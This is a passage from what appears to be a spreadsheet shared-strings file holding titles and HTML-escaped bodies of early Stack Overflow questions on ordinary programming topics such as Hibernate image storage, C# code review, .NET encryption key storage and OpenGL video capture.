    <t xml:space="preserve">&lt;p&gt;I am developing a web application using Struts 2.1.2 and Hibernate 3.2.6.GA. I have an entity, &lt;code&gt;User&lt;/code&gt;, which I have mapped to a table &lt;code&gt;USERS&lt;/code&gt; in the DB using Hibernate. I want to have an image associated with this entity, which I plan to store as a &lt;code&gt;BLOB&lt;/code&gt; in the DB. I also want to display the image on a webpage along with other attributes of the &lt;code&gt;User&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The solution I could think of was to have a table &lt;code&gt;IMAGES(ID, IMAGE)&lt;/code&gt; where &lt;code&gt;IMAGE&lt;/code&gt; is a &lt;code&gt;BLOB&lt;/code&gt; column. &lt;code&gt;USERS&lt;/code&gt; will have an &lt;code&gt;FK&lt;/code&gt; column called &lt;code&gt;IMAGEID&lt;/code&gt;, which points to the &lt;code&gt;IMAGES&lt;/code&gt; table. I will then map a property on &lt;code&gt;User&lt;/code&gt; entity, called &lt;code&gt;imageId&lt;/code&gt; mapped to this &lt;code&gt;IMAGEID&lt;/code&gt; as a Long. When rendering the page with a JSP, I would add images as &lt;code&gt;&amp;lt;img src="images.action?id=1"/&amp;gt;&lt;/code&gt; etc, and have an Action which reads the image and streams the content to the browser, with the headers set to cache the image for a long time.&lt;/p&gt;
&lt;p&gt;Will this work? Is there a better approach for rendering images stored in a DB? Is storing such images in the DB the right approach in the first place?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>pl/sql dollar operator?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I encountered the following ddl in a pl/sql script this morning:&lt;/p&gt;
&lt;p&gt;create index genuser.idx$$_0bdd0011
...&lt;/p&gt;
&lt;p&gt;My initial thought was that the index name was generated by a tool...but I'm also not a pl/sql superstar so I could very well be incorrect. Does the double dollar sign have any special significance in this statement? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are these interview questions too challenging for beginners?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I just interviewed two people today, and gave them "tests" to see what their skills were like. Both are entry level applicants, one of which is actually still in college.  Neither applicant saw anything wrong with the following code.&lt;/p&gt;
&lt;p&gt;I do, obviously or I wouldn't have picked those examples.  &lt;strong&gt;Do you think these questions are too harsh for newbie programmers?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I guess I should also note neither of them had much experience with C#... but I don't think the issues with these are language dependent. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//For the following functions, evaluate the code for quality and discuss.  E.g.
//E.g. could it be done more efficiently? could it cause bugs?        
public void Question1()
{
    int active = 0;
    CheckBox chkactive = (CheckBox)item.FindControl("chkactive");
    if (chkactive.Checked == true)
    {
        active = 1;
    }
    dmxdevice.Active = Convert.ToBoolean(active);
}
public void Question2(bool IsPostBack)
{
    if (!IsPostBack)
    {
        BindlistviewNotification();
    }
    if (lsvnotificationList.Items.Count == 0)
    {
        BindlistviewNotification();
    }
}
//Question 3
protected void lsvnotificationList_ItemUpdating(object sender, ListViewUpdateEventArgs e)
{
   ListViewDataItem item = lsvnotificationList.Items[e.ItemIndex];
   string Email = ((TextBox)item.FindControl("txtEmailAddress")).Text;
   int id = Convert.ToInt32(((HiddenField)item.FindControl("hfID")).Value);
   ESLinq.ESLinqDataContext db = new ESLinq.ESLinqDataContext();
   var compare = from N in db.NotificationLists
                 where N.ID == id 
                 select N;
   if (compare.Count() &amp;gt; 0)
   {
       lblmessage.Text = "Record Already Exists";
   }
   else
   {
       ESLinq.NotificationList Notice = db.NotificationLists.Where(N =&amp;gt; N.ID == id).Single();
       Notice.EmailAddress = Email;
       db.SubmitChanges();
   }
   lsvnotificationList.EditIndex = -1;
   BindlistviewNotification();
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I embed a File Version in an MSI file with Visual Studio?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a setup project for my C# program, and this setup project has a Version in its properties. I'd like for the MSI file that is generated to have this Version embedded in it, so I can mouse over it in explorer and see what version the file is.&lt;/p&gt;
&lt;p&gt;I'm using VS2008. How can I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What combination do you use for your polyglot solution?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Those of us who use multiple languages to solve problems can combine them in a lot of ways.  Personally I use PL/SQL, XSLT, JavaScript, and Java plus the pseudo languages HTML, XML, CSS, Ant, and Bash.  What do you use? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>IDE's for C# development on Linux?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are my options?  I tried MonoDevelop over a year ago but it was extremely buggy.  Is the latest version a stable development environment?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I provide a deep clone when implementing ICloneable?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It is unclear to me from the &lt;a href="http://msdn.microsoft.com/en-us/library/system.icloneable.aspx" rel="nofollow"&gt;MSDN documentation&lt;/a&gt; if I should provide a deep or a shallow clone when implementing ICloneable. What is the preferred option?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to detect a remote side socket close?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you detect if &lt;code&gt;Socket#close()&lt;/code&gt; has been called on a socket on the remote side?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I trust PHP __destruct() method to be called?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In PHP5, is the __destruct() method guaranteed to be called for each object instance? Can exceptions in the program prevent this from happening?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WPF Commands and Parameters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm finding the WPF command parameters to be a limitation.  Perhaps that's a sign that I'm using them for the wrong purpose, but I'm still giving it a try before I scrap and take a different tack.&lt;/p&gt;
&lt;p&gt;I put together a system for &lt;a href="http://stackoverflow.com/questions/151686/asynchrnonous-wpf-commands"&gt;executing commands asynchronously&lt;/a&gt;, but it's hard to use anything that requires data input.  I know one common pattern with WPF commands is to pass in &lt;code&gt;this&lt;/code&gt;.  But &lt;code&gt;this&lt;/code&gt; will not work at all for asynchronous commands because all the dependency properties are then inaccessible.&lt;/p&gt;
&lt;p&gt;I end up with code like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Button Command="{Binding ElementName=servicePage, Path=InstallServiceCommand}"&amp;gt;
  &amp;lt;Button.CommandParameter&amp;gt;
     &amp;lt;MultiBinding Converter="{StaticResource InstallServiceParameterConverter}"&amp;gt;
        &amp;lt;MultiBinding.Bindings&amp;gt;
           &amp;lt;Binding ElementName="servicePage" Path="IsInstalled"/&amp;gt;
           &amp;lt;Binding ElementName="localURI" Path="Text"/&amp;gt;
           &amp;lt;Binding ElementName="meshURI" Path="Text"/&amp;gt;
           &amp;lt;Binding ElementName="registerWithMesh" Path="IsChecked"/&amp;gt;
         &amp;lt;/MultiBinding.Bindings&amp;gt;
      &amp;lt;/MultiBinding&amp;gt;
  &amp;lt;/Button.CommandParameter&amp;gt;
&amp;lt;/Button&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and also need the InstallServiceParametersConverter class (plus InstallServiceParameters).&lt;/p&gt;
&lt;p&gt;Anyone see an obvious way to improve upon this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom Sorting of a DataSet Column</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a DataSet that contains a few columns. One of these columns is a number - most of the time. Because it's occasionally a string, in the database it's a varchar(10) column.&lt;/p&gt;
&lt;p&gt;However, when you sort a varchar column, it sorts it like a string. What I want to do instead is to try and override this somehow so that it sorts the integers like integers; this isn't all that hard, and I've already got a function that does this elsewhere in my code. However, I don't think it's possible to give a typed DataSet like I have a custom type with its own sorting implementation, and from what I can see BindingSource doesn't think about columns at all, which makes it awful hard to sort on them. I can easily do it using the ListView/DataGridView sorting functionality -- but I'd like the display to be in virtual mode because of the quantity of data I have, and for that I need to provide my own sorting anyway.&lt;/p&gt;
&lt;p&gt;Is there any way to do what I want to do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sqlite update field if it contains</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a database field named "widget_ids", containing data like "67/797/124/" or "45/", where the numbers are slash separated widget_ids... how would you make an update statement with SQL that would say:
"if the widget_ids of the row with id X contains the text "somenumber/" do nothing, otherwise append "somenumber/" to it's current value"&lt;/p&gt;
&lt;p&gt;Can you do something like that with SQL, or more specifically, sqlite? Is that something that is better done in the program for some reason or is there support for "if-then" like syntax in SQL?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why would you use an assignment in a condition?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In many languages assignments are legal in conditions. I never understood the reason behind this. Why would you write:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (var1 = var2) {
  ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;instead of:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var1 = var2;
if (var1) {
  ...
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>root folder equivalent in windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is C drive treated as the root folder in windows when one says \folder1\folder2\ in linux and windows C:\folder1\folder2.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>saslpasswd2: generic failure on Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I get a generic failure when I try to run:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;saslpasswd2 username
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This was installed by Collanet's Subversion 1.5.2.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any open source projects using DDD (Domain Driven Design)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to understand the concepts behind DDD, but I find it hard to understand just by reading books as they tend to discuss the topic in a rather abstract way. I would like to see some good implementations of DDD in code, preferably in C#.&lt;/p&gt;
&lt;p&gt;Are there any good examples of projects practicing DDD in the open source world?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setup wxWidget in Netbeans 6.1 C++ On MS Windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Im running Netbeans 6.1 with C++ Plugin and cygwin (gcc compiler) how do I setup wxWidget to work with it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using noweb on a large Java project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone used the &lt;a href="http://www.cs.tufts.edu/~nr/noweb/" rel="nofollow"&gt;noweb&lt;/a&gt; literate programming tool on a large Java project, where several source code files must be generated in different subdirectories? How did you manage this with noweb? Are there any resources and/or best practices out there?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java: StringBuffer &amp; Concatenation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using StringBuffer in Java to concat strings together, like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;StringBuffer str = new StringBuffer();
str.append("string value");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to know if there's a method (although I didn't find anything from a quick glance at the documentation) or some other way to add "padding".&lt;/p&gt;
&lt;p&gt;Let me explain; every time I append something to the string, I want to add a space in the end, like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String foo = "string value";
str.append(foo + " ");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I have several calls to append.. and every time, I want to add a space. Is there a way to set the object so that it will add a space automatically after each append?&lt;/p&gt;
&lt;p&gt;EDIT --&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String input
StringBuffer query = new StringBuffer();
Scanner scanner = new Scanner(System.in);
scanner.UseDelimiter("\n");
do {
   System.out.println("sql&amp;gt; ");
   input = scanner.next();
   if (!empty(input)) query.append(input);
   if (query.toString().trim().endsWith(";")) {
         //run query
   }
}
while (!input.equalsIgnoreCase("exit");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'll use StringBuilder though as grom suggested, but that's how the code looks right now&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ruby on rails (based on Mephisto) - Unable to contact server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am completely new to ruby and I inherited a ruby system for a product catalogue. Most of my users are able to view everything as they should but overseas users (specifically Mexico) cannot contact the server once logged in. They are an active user. I'm sorry I cannot be more specific, and the system is private so I cannot grant access.
Has anyone had any issues similar to this before? Is it a user-end issue or a system error?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get class property name</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have my winform application gathering data using databinding. Everything looks fine except that I have to link the &lt;strong&gt;property&lt;/strong&gt; with the &lt;strong&gt;textedit&lt;/strong&gt; using a string:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Me.TextEdit4.DataBindings.Add(New System.Windows.Forms.Binding("EditValue", Me.MyClassBindingSource, "MyClassProperty", True))&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This works fine but if I change the class' property name, the compiler obviously will not warn me . &lt;/p&gt;
&lt;p&gt;I would like to be able to get the property name by reflection but I don't know how to  specify the name of the property I want (I only know how to iterate among all the properties of the class) &lt;/p&gt;
&lt;p&gt;Any idea?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the canonical way to check for type in python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to check whether a given object is of a given type? How about checking whether the object inherits from a given type?&lt;/p&gt;
&lt;p&gt;Let's say I have an object &lt;code&gt;o&lt;/code&gt;. How do I check whether it's a &lt;code&gt;str&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to stop the Access 2007 Configuration Progress when switching versions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Like many developers I need to run more than 1 version of MS Access.  I have just installed Access 2007.  If I open Access 2003 and then open Access 2007 I have to wait 3mins for the 'Configuring Microsoft Office Enterprise 2007..." dialog.  Then if I open Access 2003 again it takes another 30secs or so to configure that.  &lt;/p&gt;
&lt;p&gt;PLEASE NOTE: I am using shortcuts to open the files that include the full path to Access.  Eg to open Access 2007:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; "C:\program files\microsoft office 12\office12\msaccess.exe" "C:\test.accdb"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and for 2003:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; "C:\program files\microsoft office 11\office11\msaccess.exe" "C:\test.mdb"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anyone have a solution to avoid this?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Transpose a set of rows as columns in SQL Server 2000</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any facility of transposing rows to columns in SQL Server (it is possible in MS-Access)? 
I was befuddled because this facility is available in MS-Access but not in SQL Server. Is it by design that this feature has not been included in SQL Server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET XmlDocument LoadXML and Entities</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When loading XML into an XmlDocument, i.e.&lt;/p&gt;
&lt;pre&gt;
XmlDocument document = new XmlDocument();
document.LoadXml(xmlData);
&lt;/pre&gt;
&lt;p&gt;is there any way to stop the process from replacing entities? I've got a strange problem where I've got a TM symbol (stored as the entity #8482) in the xml being converted into the TM character. As far as I'm concerned this shouldn't happen as the XML document has the encoding ISO-8859-1 (which doesn't have the TM symbol)&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any good free .Net network libraries? (FTP, SFTP, SSH, etc.)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a bit surprised I haven't found a good open source library for performing common network tasks. There are a few very good commercial libraries, but they're too expensive to use on an open source project. &lt;/p&gt;
&lt;p&gt;Anyone know of any?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Manage Scrum Software</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What software do you use to manage Scrum software development ?  &lt;/p&gt;
&lt;p&gt;We've tried Tackle and VersionOne (both free) so far and they are good except for the fact that it's difficult to track work in progress.  For example, if I have a task that I estimate will take me 8 hours to complete, I've done 4 hours of work with 4 hours remaining, the task is always reported as 8 hours remaining until it is marked complete, at which time it falls to zero.  &lt;/p&gt;
&lt;p&gt;I'd like to use a tool that will allow me to take an accurate work at the teams WIP at the end of each week and see how much impact that work has had towards a deadline along with completed tasks. &lt;/p&gt;
&lt;p&gt;Thanks for your input!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Has anyone used lucene.net with Linq-to-Entities?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If anyone has done this, please let me know. I don't know anything about lucene.net. I have never used it, but I heard about it. I was wondering how something like that would integrate with the Linq entity framework?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are good resources on compilation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Summary for the impatient: I'm searching for good references on generating code for common language constructs but not parsing.&lt;/p&gt;
&lt;p&gt;I am interested in programming languages and try to read the literature as much as possible. But most of them covers the topic in a functional and theoretical perspective that, I find them hard to understand let alone implement the ideas.&lt;/p&gt;
&lt;p&gt;So the question is; Which resources do you suggest about programming language implementations that covers the topic in a more imperative and practical fashion?&lt;/p&gt;
&lt;p&gt;For example, I find "&lt;em&gt;The Implementation of Lua 5.0&lt;/em&gt;" paper very instructive.&lt;/p&gt;
&lt;p&gt;Note that, I am not seeking articles about parsing or tokenizing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it feasible to create a REST client with Flex?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm starting a project using a Restful architecture implemented in Java (using the new JAX-RS standard)&lt;/p&gt;
&lt;p&gt;We are planning to develop the GUI with a Flex application. I have already found some problems with this implementation using the HTTPService component (the response error codes, headers access...).&lt;/p&gt;
&lt;p&gt;Any of you guys have some experience in a similar project. Is it feasible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Add to right click application menu in taskbar in .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Most applications only have "Restore, Move, Size, Minimize, Maximize and Close", however &lt;i&gt;MS SQL&lt;/i&gt; offers extra options "Help, Customize view". Along those lines, is it possible to add to the right click menu of an application in the task bar?  &lt;/p&gt;
&lt;p&gt;Note: I'm &lt;b&gt;not&lt;/b&gt; referring to an icon in the notification area next to the clock.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best designed form you have ever seen?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for awesome forms that are easy and intuitive to use even though they may be overly complex. Multi-page is cool too. Screen shots of the forms would be way cool.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can you get the "real" HttpContext within an ASP.NET MVC application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Unfortunately, I need to do this.  I'm using ELMAH for my error log.  Before I route to my error.aspx view, I have to grab the default ELMAH error log so I can log the exception.  You used to be able to use &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Elmah.ErrorLog.Default
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, this is now marked as obsolete.  The compiler directs me to use the method&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Elmah.ErrorLog.GetDefault(HttpContext context)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;MVC's context is of type HttpContextBase, which enables us to mock it (YAY!).  How can we deal with MVC-unaware libraries that require the old style HttpContext?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Printing leading 0's in C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to find a good way to print leading 0's, such as 01001 for a zipcode.  While the number would be stored as 1001, what is a good way to do it?&lt;/p&gt;
&lt;p&gt;I thought of using either case statements/if then to figure out how many digits the number is and then convert it to an char array with extra 0's for printing but I can't help but think there may be a way to do this with the printf format syntax that is eluding me.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>php + unixODBC + DB2 + DESCRIBE = token not valid?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Code I am trying to run:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$query = "DESCRIBE TABLE TABLENAME";
$result = odbc_exec($h, $query);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The result:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;PHP Warning:  odbc_exec(): SQL error: [unixODBC][IBM][iSeries Access
  ODBC Driver][DB2 UDB]SQL0104 - Token TABLENAME was not valid. Valid
  tokens: INTO., SQL state 37000 in SQLExecDirect in ...&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;There were no other problems with SELECT, INSERT, UPDATE or DELETE queries on the same connection. Is this a syntax error?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Overriding namespaces in gSOAP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using &lt;a href="http://gsoap2.sourceforge.net" rel="nofollow"&gt;&lt;code&gt;gSOAP&lt;/code&gt;&lt;/a&gt; as a Web Service toolkit and have generated the stub and proxy classes through &lt;code&gt;soapcpp2&lt;/code&gt; from multiple &lt;code&gt;WSDL&lt;/code&gt;s all at once. Thus all the namespace bindings are in a single &lt;code&gt;.nsmap&lt;/code&gt; file.   &lt;/p&gt;
&lt;p&gt;Now the problem is that all the namespace bindings are being sent with all the method calls I make. The &lt;code&gt;HTTP POST&lt;/code&gt; packet is unusually large and ugly. &lt;/p&gt;
&lt;p&gt;Is there a way to programatically override the namespace bindings ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does NUnit (and MSTest) handle tests that change static/shared variables?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some code that uses the shared gateway pattern to implement an inversion of control container.  I have several hundred NUnit unit tests that exercises the code that uses this IOC.  They all work (on my machine!) but I am concerned that these tests might fail under load.  I seem to remember that NUnit (and MSTest) attempts to run tests in parallel on multiple threads (which would definitely trigger race conditions on the static/shared gateway) but I cannot find any documentation that says what actually happens.  My experience is that NUnit seems to be running the tests sequencially.  My question is, does NUnit (or MSTest) ever run unit tests in parallel? If so, under what conditions?  And, can I turn this off via some sort of configuration option?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Running many virtual machines on a single host</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a need to run a relatively large number of virtual machines on a relatively small number of physical hosts. Each virtual machine isn't doing to much - each only needs to run essentially one basic network service - think SMTP or the like. Furthermore, the load on each is going to be extremely light. &lt;/p&gt;
&lt;p&gt;Unfortunately, the numbers are something like 100 virtual machines on 5 physical hosts. Each host is decent enough - core 2 with 2 gigs of ram and a 1tb disk. However, I know just taking a vmware image of ubuntu and throwing on that machine wont get me anywhere near 100 instances and would be something closer to 20.&lt;/p&gt;
&lt;p&gt;So, is there any hope for this ratio of images to hosts? Also, which implementation of virtual machine would be best suited for this purpose - ie has efficient overall usage of resources? We mostly use vmware here, but if there is a significant performance advantage that could be gained by switching to Xen or the like, I am sure we would consider it.&lt;/p&gt;
&lt;p&gt;Thank you in advance for your insights :)&lt;/p&gt;
&lt;p&gt;Note: We ended up using OpenVZ and it worked rather well. The default parameters for an ubuntu template let us run about 40 instances per machine.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stuff in Windows Form Move When Maximized - C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It's been a while since I've programmed a GUI program, so this may end up being super simple, but I can't find the solution anywhere online.  &lt;/p&gt;
&lt;p&gt;Basically my problem is that when I maximize my program, all the things inside of the window (buttons, textboxes, etc.) stay in the same position in the window, which results in a large blank area near the bottom and right side.  &lt;/p&gt;
&lt;p&gt;Is there a way of making the the elements in the program to stretch to scale?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>php Access violation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to install Php on Vista (IIS 7). The installation and configuration seems to be fine. Pretty much followed everything mentioned in &lt;a href="http://blogs.iis.net/bills/archive/2006/09/19/How-to-install-PHP-on-IIS7-_2800_RC1_2900_.aspx" rel="nofollow"&gt;http://blogs.iis.net/bills/archive/2006/09/19/How-to-install-PHP-on-IIS7-_2800_RC1_2900_.aspx&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I can even bring up a test.php which is basically  and can also connect to mysql db through code. But when I try to bring up some other php page like drupal's index page or phpmyadmin  index page, it brings up a Php access violation message. &lt;/p&gt;
&lt;p&gt;Any clue whats happening? Also is there some tracing/diagnositic tool for php to trace whats happenign on the webserver. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>XML Parsing Error: SYSTEM or PUBLIC, the URI is missing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am parsing an RSS feed from the following URL:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://rss.sciam.com/ScientificAmerican-Global?format=xml" rel="nofollow"&gt;http://rss.sciam.com/ScientificAmerican-Global?format=xml&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// $xml_text is filled with the contents read from the URL
$xml_parser = xml_parser_create();
$res = xml_parse($xml_parser, $xml_text);
if (!$res) {
  $error =
    xml_error_string(xml_get_error_code($xml_parser)).
    " at line ".
    xml_get_current_line_number($xml_parser);
}
// $error contains: "SYSTEM or PUBLIC, the URI is missing at line 1"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="http://FeedValidator.org" rel="nofollow"&gt;FeedValidator.org&lt;/a&gt; says this is a good feed.&lt;/p&gt;
&lt;p&gt;How can I get PHP's XML parser to work around this error?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: It looks like they are redirecting this feed to another location based on the user-agent.  My PHP script is not getting the correct feed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Persistent storage of encrypted data using .Net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to store encrypted data (few small strings) between application runs. I do not want the user to provide a passphrase every time (s)he launches the application. I.e. after all it goes down to storing securely the encryption key(s).&lt;/p&gt;
&lt;p&gt;I was looking into RSACryptoServiceProvider and using PersistentKeyInCsp, but I'm not sure how it works. Is the key container persistent between application runs or machine restarts? If yes, is it user specific, or machine specific. I.e. if I store my encrypted data in user's roaming profile, can I decrypt the data if the user logs on a different machine?&lt;/p&gt;
&lt;p&gt;If the above does not work, what are my options (I need to deal with roaming profiles).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recommended gcc warning options for C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Other than -Wall what other warnings have people found useful?&lt;/p&gt;
&lt;p&gt;&lt;a href="http://gcc.gnu.org/onlinedocs/gcc-4.3.2/gcc/Warning-Options.html"&gt;http://gcc.gnu.org/onlinedocs/gcc-4.3.2/gcc/Warning-Options.html&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LINQ query with multiple aggregates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How would I create the equivalent Linq To Objects query?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT MIN(CASE WHEN p.type = "In" THEN p.PunchTime ELSE NULL END ) AS EarliestIn,
       MAX(CASE WHEN p.type = "Out" THEN p.PunchTime ELSE NULL END ) AS LatestOUt
FROM Punches p
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Capturing video out of an OpenGL window in Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am supposed to provide my users a really simple way of capturing video clips out of my OpenGL application's main window. I am thinking of adding buttons and/or keyboard shortcuts for starting and stopping the capture; when starting, I could ask for a filename and other options, if any. It has to run in Windows (XP/Vista), but I also wouldn't like to close the Linux door which I've so far been able to keep open.&lt;/p&gt;
&lt;p&gt;The application uses OpenGL fragment and shader programs, the effects due to which I absolutely need to have in the eventual videos.&lt;/p&gt;
&lt;p&gt;It looks to me like there might be even several different approaches that could potentially fulfill my requirements (but I don't really know where I should start):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;An encoding library with functions like startRecording(filename), stopRecording, and captureFrame. I could call captureFrame() after every frame rendered (or every second/third/whatever). If doing so makes my program run slower, it's not really a problem.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;A standalone external program that can be programmatically controlled from my application. After all, a standalone program that can &lt;em&gt;not&lt;/em&gt; be controlled almost does what I need... But as said, it should be really simple for the users to operate, and I would appreciate seamlessness as well; my application typically runs full-screen. Additionally, it should be possible to distribute as part of the installation package for my application, which I currently prepare using NSIS.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Use the Windows API to capture screenshots frame-by-frame, then employ (for example) one of the &lt;a href="http://stackoverflow.com/questions/93954/how-to-programatically-create-videos"&gt;libraries mentioned here&lt;/a&gt;. It seems to be easy enough to find examples of how to capture screenshots in Windows; however, I would love a solution which doesn't really force me to get my hands super-dirty on the WinAPI level.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Use OpenGL to render into an offscreen target, then use a library to produce the video. I don't know if this is even possible, and I'm afraid it might not be the path of least pain anyway. In particular, I would not like the actual rendering to take a different execution path depending on whether video is being captured or not. Additionally, I would avoid anything that might decrease the frame rate in the normal, non-capture mode.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
